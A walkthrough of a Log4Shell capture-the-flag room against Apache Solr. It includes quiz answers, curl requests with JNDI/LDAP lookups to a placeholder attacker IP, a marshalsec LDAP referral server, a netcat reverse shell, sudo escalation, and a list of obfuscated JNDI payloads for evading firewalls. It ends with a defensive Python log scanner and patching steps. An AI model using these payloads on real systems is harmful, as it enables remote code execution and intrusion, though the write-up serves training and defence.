1. What service is running on port 8983? (Just the name of the software) Answer: Apache Solr
Found with a full port scan (-p- scans all ports).
1. Take a close look at the first page visible when navigating to http://10.65.142.0:8983. You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page?
Answer: /var/solr/logs
- One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file contains this repeated entry?
Look through the given files for the one with the most repeated requests (give the file name).
Answer: solr.log
- What "path" or URL endpoint is indicated in these repeated entries?
The same file, solr.log, shows the path.
Answer: /admin/cores
- Viewing these log entries, what field name indicates some data entrypoint that you as a user could control?
Looking through solr.log we see many requests, but no parameters are passed; the field a user could control is empty: params={}.
Answer: params
First, find your own IP address using ip a.
Start a listener: nc -lvnp 9999
Open another terminal and send the request:
curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=${jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:9999}'
If you get a response in the listener (nc -lvnp 9999), the connection is working; then move on to exploitation.
# Exploitation
**I have done this on my own machine, not in the AttackBox.**
They also provide instructions for following along without the AttackBox.
Obtaining the LDAP referral server, which is already on git:
Initial command: git clone https://github.com/mbechler/marshalsec
Start the LDAP server: java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://192.168.188.160:8000/#Exploit"
Answer: Listening on 0.0.0.0:1389
Start the Exploit Java payload:
Create the Java file and run it.
*Important: run the Python HTTP server from the same folder (it serves the payload on port 8000).*
*Start netcat:*
nc -lvnp 9999
**Execute the code:**
curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=${jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit}'
**Finally,**
we get access.
To better understand this log4j vulnerability, let's grant ourselves "better access" so we can explore the machine, analyze the affected logs, and even mitigate the vulnerability!
1. whoami
Answer: solr
NOTE: here the command and the answer look the same as in the room, so next:
python3 -c "import pty; pty.spawn('/bin/bash')"
sudo -l - Check super user permissions. For your convenience in this exercise, your user should have sudo privileges without the need for any password.
Now access the machine via SSH, momentarily become root and change the password for the solr user to one of your choosing.
sudo bash, then passwd eleven, then re-enter the password eleven.
Exit the netcat shell and SSH in: ssh solr@MACHINE_IP
We already know from Task 3 that the solr.log path is /var/solr/logs.
cat /var/solr/logs/solr.log
We can check that our code was executed.
Even now, a firewall may block the JNDI/LDAP connection or similar things, but there are some tricky ways to bypass that, such as the payloads below:
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
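Because these variants hide the literal string `${jndi:` from a naive grep, a defender has to resolve the nested lookups before matching. As an added example (not part of the original writeup or the room), the Python below de-obfuscates the lower/upper/default forms listed above and then scans constructed solr.log-style lines for a surviving `${jndi:` lookup. It assumes the referenced environment variables are unset, so the `:-` default value is what log4j would substitute.

```python
import re

# Innermost lookup forms used by the evasion payloads above. Each pattern only
# matches a lookup with no nested ${...} inside it, so repeated substitution
# peels the nesting from the inside out.
SIMPLE_LOOKUPS = [
    (re.compile(r"\$\{lower:([^${}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^${}]*)\}", re.I), lambda m: m.group(1).upper()),
    # ${::-x} and ${env:NAME:-x}: the text after ":-" is the default that
    # survives when the lookup is empty or the variable is unset (assumed here).
    (re.compile(r"\$\{(?:env:[^${}]*?)?::?-([^${}]*)\}", re.I), lambda m: m.group(1)),
]
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text, max_rounds=32):
    """Resolve nested lower/upper/default lookups until nothing changes."""
    for _ in range(max_rounds):
        resolved = text
        for pattern, repl in SIMPLE_LOOKUPS:
            resolved = pattern.sub(repl, resolved)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_lookup(text):
    """True if the de-obfuscated text still contains a ${jndi:...} lookup."""
    return JNDI.search(normalize(text)) is not None


def scan_log(lines):
    """Return (line number, normalized line) for every suspicious entry."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1)
            if is_jndi_lookup(line)]


# Constructed sample lines shaped like Solr's /admin/cores INFO entries.
PREFIX = ("2021-12-13 09:00:00.000 INFO  (qtp1-12) [   ] o.a.s.s.HttpSolrCall "
          "[admin] webapp=null path=/admin/cores params=")
SAMPLE_LOG = [
    PREFIX + "{} status=0 QTime=1",
    PREFIX + "{foo=${jndi:ldap://attackerendpoint.com/a}} status=0 QTime=1",
    PREFIX + "{foo=${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}} status=0 QTime=1",
    PREFIX + "{foo=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}} status=0 QTime=1",
    PREFIX + "{action=STATUS&wt=json} status=0 QTime=2",
]

if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
```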
solr.in.sh contains the Apache Solr server configuration.
locate solr.in.sh
1. What is the full path of the specific solr.in.sh file?
Answer: /etc/default/solr.in.sh
cd to /etc/default
nano solr.in.sh and paste the line SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" inside the file
(this restricts message lookups and stops the exploitation)
Then restart the service: sudo /etc/init.d/solr restart
Successfully done; now we are going to check the exploit again.
If you check, it no longer receives the request and nothing is triggered.
Alternatively, update to the latest version (2.17.0), which disables JNDI. Where appropriate, please ensure you patch the logging-log4j package to version 2.16.0 or higher (as new releases become available). In version 2.16.0, JNDI is fully disabled, support for Message Lookups is removed, and the new DoS vulnerability CVE-2021-45046 is not present. Download this release here: https://github.com//logging-log4j2/releases/tag/rel%2F2.16.0
Room created by JohnHammond
